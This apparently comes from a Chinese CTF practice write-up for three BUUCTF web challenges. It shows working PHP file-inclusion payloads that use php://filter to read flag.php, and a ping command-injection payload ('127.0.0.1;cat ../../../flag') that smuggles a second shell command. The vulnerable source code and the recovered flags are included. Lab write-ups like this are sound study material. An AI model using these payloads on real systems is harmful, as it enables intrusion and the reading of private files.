BUUCTF-Web练习-01

[ACTF2020 新生赛]Include

原始

题目提供的信息是：

http://xxx.xxx.xxx:xxx?file=flag.php
伪协议漏洞

解题

// 在URL传入一个伪协议的参数尝试读取文件
    ?file=php://filter/convert.base64-encode/resource=index.php

// 得到如下的编码信息：
    PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg==

 
解码后得到源代码
    echo base64_decode("PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg==");

(源码)
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}
if($file){
	include($file);
}else{
	echo '<a href="?file=flag.php">tips</a>';
}
?>

核心代码分析

$file = $_GET["file"];
# 被封禁的伪协议
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
	exit('hacker!');
}

# 文件包含
if($file){
	include($file);
}else{
	echo '<a href="?file=flag.php">tips</a>';
}

参数和函数都看得懂,问题是怎么写伪协议的payload

部分伪协议功能:
phar:// — PHP 归档
file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流（I/O streams）
zlib:// — 压缩流
data:// — 数据（RFC 2397）
glob:// — 查找匹配的文件路径模式
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

来源处:https://blog.csdn.net/qq_53142368/article/details/116594299

原本访问的那个界面有一个flag.php,直接访问的时候是php代码,尝试读取出来

payload:
    读取flag文件
        http://ab5d369b-1004-496f-a36f-c064b146234c.node4.buuoj.cn:81?file=php://filter/convert.base64-encode/resource=flag.php
    将flag文件读取出来的base64数据流反base64输出
        echo base64_decode("PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7MmIxZjc1NWYtYzhjNS00ZWRjLTg3OTUtMGU5NWNlMDZlMjE2fQo=");
        
    <?php
    echo "Can you find out the flag?";
    //flag{2b1f755f-c8c5-4edc-8795-0e95ce06e216} 
    你没看错,这就是flag.
    我也没想到这么简单,应该是为了让我们认识下什么是伪协议.

[ACTF2020 新生赛]Exec

题目原始信息

白给题,原始信息就一个:

ping输入框,输入IP地址后,ping出结果并且返回.

解题

尝试以这种方式去ping:
    127.0.0.1;ls
得到列表信息:
    index.php
尝试返回文件信息:
    127.0.0.1 ;cat index.php
得到关键代码:
    <?php 
    if (isset($_POST['target'])) {
        system("ping -c 3 ".$_POST['target']);
    }
    ?>
既然没有任何过滤,翻翻目录找flag就行了

payload:
    url:     http://944db2e2-a4b3-4a25-b013-30417e6e64ff.node4.buuoj.cn:81/
    post参数: target=127.0.0.1;cat ../../../flag

[极客大挑战 2019]Secret File

原始信息

Bp抓包抓到了一个php文件提示，打开看到关键源码

URL:
http://2c82657e-e201-4348-b33d-47abac2a24ec.node4.buuoj.cn:81/secr3t.php

获取的源码：
<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

解题

核心源码：

$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
include($file); 

源码解析

$file=$_GET['file'];
# 禁止某些伪协议
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
}
# 通过伪协议就文件包含
include($file); 

和上一道是一模一样的，试试看：

payload:
   URL: http://2c82657e-e201-4348-b33d-47abac2a24ec.node4.buuoj.cn:81/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
   Base64解码得到的base64编码：
        $a = 'PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7Y2IyNzU4NDAtMjFlNC00OWJkLThhOWItNmVjODQ1NWFiZTdifSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo= ';
        echo(base64_decode($a));   

    源码：
        <!DOCTYPE html>
        <html>
            <head>
                <meta charset="utf-8">
                <title>FLAG</title>
            </head>
            <body style="background-color:black;"><br><br><br><br><br><br>
                <h1 style="font-family:verdana;color:red;text-align:center;">啊哈！你找到我了！可是你看不到我QAQ~~~</h1><br><br><br>
                <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
                    <?php
                        echo "我就在这里";
                        $flag = 'flag{cb275840-21e4-49bd-8a9b-6ec8455abe7b}';
                        $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
                    ?>
                </p>
            </body>
        </html>